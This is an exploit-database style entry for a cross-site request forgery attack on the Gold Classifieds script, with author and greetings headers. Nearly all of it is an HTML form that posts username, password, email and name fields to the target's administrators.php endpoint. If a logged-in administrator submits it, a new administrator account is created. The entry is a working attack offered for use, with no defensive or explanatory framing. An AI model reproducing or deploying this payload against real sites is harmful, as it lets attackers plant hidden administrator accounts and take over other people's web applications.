# Exploit Title: GOLD CLASSIFIEDS CSRF (add admin) # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/gold-classifieds/21401/ # Category:: webapps # Demo : http://www.scripts-demo.com/gold-classifieds/administration # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form method="post" action="target.com/[PATH]/administrators.php?action=admins_home"> <input maxlength="15" value="" name="username" size="15" class="field10"/> <input maxlength="15" name="password" size="15" class="field10"/> <input value="mail@mail.com" maxlength="255" name="email" size="70" class="field10"/> <input value="name" maxlength="255" name="name" size="70" class="field10"/> <input type="submit" class="button10" value="Submit" name="submit"/> </form>